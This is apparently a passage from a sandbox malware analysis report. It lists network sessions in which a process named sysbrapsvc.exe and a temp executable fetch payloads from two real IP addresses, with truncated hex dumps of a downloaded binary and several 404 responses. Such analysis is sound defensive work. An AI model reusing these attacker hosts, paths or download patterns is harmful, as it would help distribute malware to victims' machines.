3a 55 d4 63 0c 97 [TRUNCATED]
                                                                              Data Ascii: n}_JE.ycv63LutJx<&RygEp:K6qjdq~8#<&gu~Vb]RR"-W54Tz7ZAgM];3UG)H5a'ubW?dcs^B`B;%'z7Jhqm+aV6OUk$(KfdKP{M"sGHoL]-=(/3l@a[oxCU<-5xg\*=g BnRZtX}i_.-&:UcRSTud^3n<YyiiIetwjEJIe9n[~RTz~-g eKqBga-2bgeG\Kk-M5668Gjj+N<"AY<A0PMXZdlLPVevy2lHS2>Nn<p5q7Rpet \w\3]OzWt\<7$Z/BNeoq#q4V5r0%)-`9u%:oF8Li~}WJ3VV0}4tVT[O+27Gt!rn<DI3KI=0FlLW~^'.Am~U<lab+GIJrKEf`.0t}0^"q';1q1?n=*:NOrsGDjw_Hi`DkkHjAfi\&y57v~$~H [TRUNCATED]
                                                                              May 8, 2024 15:24:24.843640089 CEST1289INData Raw: f7 94 da 7b e6 b6 fe 0f a6 64 19 c2 ef 0c 25 ba 8a dc 2e e0 30 f4 54 50 75 d1 a6 f4 59 1c b4 b9 d6 5d ff c8 5e 3e 5b 07 7a 96 73 9b ae 22 d8 6b 94 c6 57 3e d8 71 a6 7b 47 b5 fd bf db f8 4c d1 a0 dc 40 6d 3e 69 9d 81 d1 0a 59 7c bc 21 67 cc 11 6c
                                                                              Data Ascii: {d%.0TPuY]^>[zs"kW>q{GL@m>iY|!gl.8D4JG?x/\@D;=(-Z!fH^;7|+$=zzC-dyfm3UW:eZP}c\i[^]:_((<E26+W]
                                                                              May 8, 2024 15:24:24.843713999 CEST1289INData Raw: 36 b6 60 d6 42 d5 be b8 10 0f 5e 53 6b 05 0c bb e0 3a fd c1 4c da c6 b2 ce 72 f2 28 ff e2 e4 db da 87 14 d0 4f 41 0e 55 57 fa be d2 25 4d 12 33 a4 70 68 6c 6c 2b a3 44 06 79 cc 95 93 eb 72 2a b2 f0 3b de cd b0 3a c3 dc 34 b8 c3 7d 7f 3e 04 b4 75
                                                                              Data Ascii: 6`B^Sk:Lr(OAUW%M3phll+Dyr*;:4}>u)xA*r\IAc:X1v".&9>^Q!4D "Ifh`(^+O1YPMZk(*x6nsclZ28_o0 k@!HuyA
                                                                              May 8, 2024 15:24:24.843729019 CEST1289INData Raw: 93 f1 1e 94 53 39 c9 d2 e2 09 21 6e 04 82 7e 50 d7 b3 b4 7a 0f 0c 6e f7 f3 72 9f 81 e7 4f 18 63 7d f3 82 53 8a c0 24 d3 f8 5f e5 bf 54 41 82 a4 fd fd 43 2d f5 13 2e c4 5b 9d f3 91 c6 f4 2e 55 bd e6 d6 75 a2 c3 d0 94 74 c8 cb 28 b6 dc f0 93 b5 29
                                                                              Data Ascii: S9!n~PznrOc}S$_TAC-.[.Uut()w~oLYj=e|qRaf;\o*FsJUS~T,om^&)Nh0/(Fy0qC4AOPp/iP?b4k"/8:V,p#$S=+
                                                                              May 8, 2024 15:24:24.843743086 CEST1289INData Raw: 33 51 0b bf 02 90 7d ae a0 4a f2 d7 4e 24 7a af 58 7f 8c 57 b1 0b ba f7 ad e3 5e a3 5c e2 17 41 70 26 55 dd e1 15 18 42 00 13 72 95 8a e6 0e bd 09 e1 cc 12 1d 94 48 d8 7f 9a a1 3a f8 a8 cd 4e 93 44 96 32 4d c1 d3 0f 72 e9 7c 3f f8 63 58 4c c1 64
                                                                              Data Ascii: 3Q}JN$zXW^\Ap&UBrH:ND2Mr|?cXLdydQ]X4&S{81eJE0]'k?mvv@Z|Bm9+7qd=Sf&x5h_VS>i2J(I-#$4V0
                                                                              May 8, 2024 15:24:24.843758106 CEST1289INData Raw: 75 f2 a4 6e 8c 81 1a ce 92 da 4e 55 fe 12 bc 9a 1d 07 16 a6 2c bb f4 14 e5 47 0e 5a ef 01 75 2d ca 7b 4a 24 d7 7f 58 3b f8 05 9d ad 36 f6 0e 9b 79 24 3d a3 86 9b 25 40 e7 93 e1 8a 71 37 ce 6a e1 85 1b d8 41 0b 62 b1 13 8e f5 76 e9 fe 55 d1 d5 ad
                                                                              Data Ascii: unNU,GZu-{J$X;6y$=%@q7jAbvU#i=a=7C(qPt]*:u0-/G3n~ulB41Q*txp{-M*u8H_8`<,d(,r*h8zG30J<W@zb
                                                                              May 8, 2024 15:24:24.843832970 CEST1289INData Raw: 22 8e fe 4a ef 62 4e fb 52 d3 10 f6 27 c8 5a 0d 9d 1d 25 85 59 6d 73 a2 2f f1 99 3c 63 a3 86 05 ed 4f 9d 19 fc 5b 79 4c 9c 5d b0 b8 13 8f c1 7b f3 b0 4b c7 c7 1a 66 c4 e8 67 59 56 e9 a8 38 19 67 57 78 8a eb f9 39 3e 92 c1 ed 14 f1 fe 1f 11 e3 ac
                                                                              Data Ascii: "JbNR'Z%Yms/<cO[yL]{KfgYV8gWx9>_tM~Q^>%\-WTTNzroS5]j9G$J,)govS8}BeW9kF,};P.2AE$!t`Gnx\pB
                                                                              May 8, 2024 15:24:24.843846083 CEST201INData Raw: 81 31 21 d8 8e 36 78 b3 2d 82 77 69 8a df 7e 62 18 45 06 17 54 88 d6 0a 13 39 f8 83 01 5f 60 e5 2f e2 a3 e1 ad 97 41 c3 f3 ff 04 87 45 be a8 6c b3 32 c4 02 f6 a3 27 6b b3 e7 12 44 a7 58 da 60 98 22 14 cc 06 3f 84 e5 8b 84 0c 98 a8 be 53 a5 2f 6a
                                                                              Data Ascii: 1!6x-wi~bET9_`/AEl2'kDX`"?S/jeUA?bkXwY;HzObN6<2%8bp2ePK1f:Kd$\kvjZz,{


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              31192.168.2.849758185.215.113.66805588C:\Windows\sysbrapsvc.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 8, 2024 15:24:27.497114897 CEST166OUTGET /6 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                              Host: 185.215.113.66
                                                                              May 8, 2024 15:24:27.836029053 CEST1289INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:24:27 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 11520
                                                                              Last-Modified: Sat, 04 May 2024 13:18:06 GMT
                                                                              Connection: keep-alive
                                                                              ETag: "6636358e-2d00"
                                                                              Accept-Ranges: bytes
                                                                              Data Raw: 4d 69 d1 66 af 90 ca ef 04 18 04 8f 9a 4f 78 79 a1 72 45 cd 89 72 d1 57 c0 33 c8 d8 28 db 5b 31 72 fa ec 98 3c 67 3f a8 16 70 92 cc 17 52 3d bb 9c 7b 03 65 25 32 e0 f5 c9 73 9d f1 c1 03 8b 8e 35 d8 88 02 5c 9e 73 f4 5b 07 c1 59 15 e9 c6 f5 e9 ef ad d9 43 18 62 a0 a9 2f 0a 3e 55 89 eb 57 0d 52 27 a6 07 3a 8b a9 bf 6c 43 a0 c6 ec 73 86 2c 9e 66 7d 06 e8 29 fd 4f 06 ba 83 84 25 5e 77 3e ad 2f e6 c8 42 af 31 8c 99 1e c4 f3 8d d4 94 d6 e0 12 42 3f ef 15 eb 39 c4 ff 0d a7 86 c6 e5 10 fc 73 6e ab 62 92 c2 cd 28 06 90 55 e6 71 50 2b 89 99 62 40 9b 39 d1 35 82 0d 31 00 b7 89 c9 29 bb 7d ec b0 ea 71 90 84 34 1d b7 73 e9 b8 4f 66 ae ce b1 f4 c6 6b 53 a3 c4 e2 b8 1a 13 69 8d 8d c5 6e 29 c8 3e 7c 53 2f 76 35 46 20 d0 37 48 e0 81 55 8c 36 e9 2e c7 17 43 32 30 71 9e 05 33 43 0d ba 30 31 91 e7 98 12 0b ba 93 dd 00 de 30 fd 0f 7c 5a 37 06 55 11 28 6f 92 5e b5 c8 f4 c0 78 2a c2 0a fd 4a 0c f8 13 b4 58 8e e9 79 4d 99 7a 1c 94 f8 12 84 db 8c 82 fd 3a 97 f0 92 23 5e 84 cb 02 45 5b 00 bb 11 d2 71 33 9b 87 c5 d8 f7 ce 18 [TRUNCATED]
                                                                              Data Ascii: MifOxyrErW3([1r<g?pR={e%2s5\s[YCb/>UWR':lCs,f})O%^w>/B1B?9snb(UqP+b@951)}q4sOfkSin)>|S/v5F 7HU6.C20q3C010|Z7U(o^x*JXyMz:#^E[q3L\?w5T_ZA#[jqUyG )1a]rbwlZQuafbnpn3,k#k!rqB9O8XY%pQfC8GDoyPyWo?!/nZzK|C[-EgEeGpwuyh%,5GjJP!mmHQr)oVJ<Wh#<"Tf+8}K4&sR'{nLgu9NYRs^sA7G2mI8Yj{*%aU=Xg&TRg&B5wiroW+8dlnrthwID&4P"T@Uj'E_rMzAl!F}fsunfb3#C4&@@G1 ioC,WAZw.d3!LsF= ?T{ R*M]V?:HK//|f"?6edfIM"3\Dys:yKhNFwY"oQtyFt9t:" [TRUNCATED]
                                                                              May 8, 2024 15:24:27.836129904 CEST1289INData Raw: fb 97 3d 42 70 69 f4 d0 6a d4 64 5d a9 23 47 e7 52 a7 c1 d7 43 8f cf 0d 5b 9a aa 34 1e 7a 10 5f ac 61 5b 0a 44 53 86 32 fc 6b 44 b6 49 0a c7 40 06 33 92 a6 5d 6c 1e 63 f7 06 96 6e 19 64 25 51 78 ac 38 7c 66 e1 8d 97 78 f2 9d 59 03 21 60 8e 4e 9a
                                                                              Data Ascii: =Bpijd]#GRC[4z_a[DS2kDI@3]lcnd%Qx8|fxY!`N5zm"@%hlTz?g4Da:2\iTe.AD$F=u<N<>L%Acf5"-+"Zhb'6Y-b<D0Hn6S#}2qV!jVe&yPyXC*
                                                                              May 8, 2024 15:24:27.836144924 CEST1289INData Raw: 1a 46 bb ff b1 fa 98 44 c5 18 6c 9e 0d ec 06 f9 44 ad ac 14 68 8e 3c 37 c7 63 f7 ba f9 8e 1b 7d 54 ce d3 2c 5b d2 fc 55 f9 78 94 81 b2 1f a7 3a b6 3c ec 69 e6 35 7c 15 79 48 36 d9 9e 73 0a 15 67 8d 1f 32 00 43 7d f6 90 4e 5b d7 bf 3b 6d 8a c6 0d
                                                                              Data Ascii: FDlDh<7c}T,[Ux:<i5|yH6sg2C}N[;mPTHNCSQwcXpRwDF1[^3LTk6QgGt,C`bO?FE`;,fdBlJ1$z/AhCZTK~*KBK<}r5uJ^
                                                                              May 8, 2024 15:24:27.836158037 CEST1289INData Raw: d6 7d f5 5f d9 ad a7 b3 48 ed 48 0f ed d0 a6 96 e0 05 f7 34 23 65 b6 2a 32 d5 2b 99 9e 59 e7 a9 c2 a3 a2 1e 4b aa 64 c1 ae 4e b8 34 7b 57 88 1d d0 92 ef 80 86 9d e5 82 de 2c 4b 34 03 65 a1 e8 4a ba 91 c0 a7 02 74 37 db ea aa 60 a0 a4 7a 12 0d 6d
                                                                              Data Ascii: }_HH4#e*2+YKdN4{W,K4eJt7`zmZ5UG?RN'Oio?b[AEvS&;=YFj"a_Y**'ih5T4DrE:o^D0C,cyxD~KlE,P/'mP~S
                                                                              May 8, 2024 15:24:27.836173058 CEST1289INData Raw: 40 9d 2f 40 92 1d dc 2e 2d 37 07 95 c0 ca 27 b3 45 f9 db 57 cc 3c b3 94 3c 1c 6e a7 f9 03 68 03 f9 94 26 62 55 3d d2 84 91 a2 08 81 a0 cf 06 ad 0a 96 5d 18 4d 46 d5 71 52 28 c2 23 ad 04 c6 9e 13 96 5a df 9d 4a 31 8a 0d 44 89 cd 7a 9e 0a 4b af 79
                                                                              Data Ascii: @/@.-7'EW<<nh&bU=]MFqR(#ZJ1DzKyZ~s^V,j{OZ|4Mi{0X~xLSITC[H{X4obLUFSYCA[kW0ym9_"^^%D8RL4/!~=\MIDW.xtL<7QH2
                                                                              May 8, 2024 15:24:27.836184978 CEST1289INData Raw: 44 4d a6 a3 b7 22 c2 5b 9f 42 16 aa a0 54 8e 79 60 78 63 27 93 c8 7b 4f 79 c4 39 e2 83 37 c6 3c 77 b6 6f c5 bd 55 c4 dd af 2f d6 8e 19 0b 89 c3 74 7c e8 62 ed 59 e0 3d f9 9f f6 a4 01 1a db e9 8e c3 a0 08 ab b1 db ce c5 be 6b 2e c1 21 3d 3b 72 f6
                                                                              Data Ascii: DM"[BTy`xc'{Oy97<woU/t|bY=k.!=;r\&q9C_SfNHUFANxjH{0FX#pyzcL(&5FGv@OJu$u;.:Kr3{Ys'~40.gW9-p
                                                                              May 8, 2024 15:24:27.836199045 CEST1289INData Raw: 96 c7 1e 99 2a 65 47 5a 2f 04 61 95 c3 f7 3b 13 2d 1f 19 99 60 44 70 cc 71 89 26 ce fe 61 07 db 08 67 7b ef 72 66 48 9c 03 5c 52 eb 77 87 ba e0 6c 75 f8 82 5e 71 cc 4e 93 81 a7 97 ee d8 22 7d fd 87 70 04 2c 56 52 7b 5c c1 82 64 36 3b 23 11 5b 64
                                                                              Data Ascii: *eGZ/a;-`Dpq&ag{rfH\Rwlu^qN"}p,VR{\d6;#[dRuuo5h{.pQajc}hqR';C@{F#O8rlES06QI,W|<#wF%\3'J,|pi-]D
                                                                              May 8, 2024 15:24:27.836211920 CEST1289INData Raw: ad 00 b0 d7 3a 66 4e 1e 03 44 ca 9a 69 86 81 3d 7b 3e 74 3d 11 a0 40 8a b0 4a ec 07 f1 39 3a c3 8a 08 fe 9a 04 56 91 cb 6e 0b b7 3d 71 77 1a ab 17 c8 b2 a1 13 f0 84 da c4 a6 3d 8b 0e b7 48 c2 70 8b 3d 79 0b 7b d0 83 40 bc 6e 63 e0 65 3c eb 92 7d
                                                                              Data Ascii: :fNDi={>t=@J9:Vn=qw=Hp=y{@nce<}K;m)2<+)}R|KG#Hp;+q-a+PG V(:2\%D#v_=Vcf~t*UszjG,Hj|kwD^J[2;
                                                                              May 8, 2024 15:24:27.836225033 CEST1289INData Raw: 4a fc ac 2a f0 d4 7f 4b 5b 5e d3 b6 bb f2 53 4c 5a 65 a8 db fd c0 16 ef fa 31 99 22 f9 0c fc 39 a7 0a 63 e4 67 bf a5 a8 22 34 1f 1a 3e 8f 8b 2c 95 d1 b2 2f 63 fb d3 8c b1 e4 9b d3 5c f8 a4 85 be 1f 12 ae 72 d5 58 85 43 52 e6 38 c2 6f 80 6d 00 79
                                                                              Data Ascii: J*K[^SLZe1"9cg"4>,/c\rXCR8omy*DoBpxA|l;)/m:O[]n&A=+a#c7vC#c&UQXZa.J_ana^-:V:jdx+.<K="uR`*2SY
                                                                              May 8, 2024 15:24:27.836236000 CEST184INData Raw: 62 6b e6 21 ab a9 eb e8 9e 02 55 78 11 38 01 35 39 77 e9 44 37 e2 1d f0 1e a9 4c 4a ab 33 4c eb 41 0e 7e b2 f2 cb 7b c4 d9 0a 53 01 ea 34 e0 60 75 f2 6c 58 bc 8e db 3d 9d 02 23 ac bf af 98 e0 41 25 68 5a 3d a9 69 92 af 5f 51 c7 ca 1d de fa 66 d1
                                                                              Data Ascii: bk!Ux859wD7LJ3LA~{S4`ulX=#A%hZ=i_Qf]J`7LO/6o.?n-;K/:W$[G}coB%9lA=Nj@E_*+q{@:'W1pfe


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              32192.168.2.84975991.202.233.141802060C:\Users\user\AppData\Local\Temp\1146722911.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 8, 2024 15:24:27.903503895 CEST167OUTGET /_1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
                                                                              Host: 91.202.233.141
                                                                              May 8, 2024 15:24:28.262655020 CEST728INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:24:28 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 564
                                                                              Connection: keep-alive
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                              May 8, 2024 15:24:30.294775009 CEST167OUTGET /_2 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
                                                                              Host: 91.202.233.141
                                                                              May 8, 2024 15:24:30.652537107 CEST728INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:24:30 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 564
                                                                              Connection: keep-alive
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                              May 8, 2024 15:24:32.685553074 CEST167OUTGET /_3 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
                                                                              Host: 91.202.233.141
                                                                              May 8, 2024 15:24:33.043720961 CEST728INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:24:32 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 564
                                                                              Connection: keep-alive
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              33192.168.2.84976191.202.233.141805588C:\Windows\sysbrapsvc.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 8, 2024 15:24:31.229809046 CEST166OUTGET /1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                              Host: 91.202.233.141
                                                                              May 8, 2024 15:24:31.584639072 CEST728INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:24:31 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 564
                                                                              Connection: keep-alive
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              34192.168.2.84976291.202.233.141805588C:\Windows\sysbrapsvc.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 8, 2024 15:24:33.960163116 CEST166OUTGET /2 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                              Host: 91.202.233.141
                                                                              May 8, 2024 15:24:34.309627056 CEST728INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:24:34 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 564
                                                                              Connection: keep-alive
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              35192.168.2.84976491.202.233.141805588C:\Windows\sysbrapsvc.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 8, 2024 15:24:36.700463057 CEST166OUTGET /3 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                              Host: 91.202.233.141
                                                                              May 8, 2024 15:24:37.058093071 CEST728INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:24:36 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 564
                                                                              Connection: keep-alive
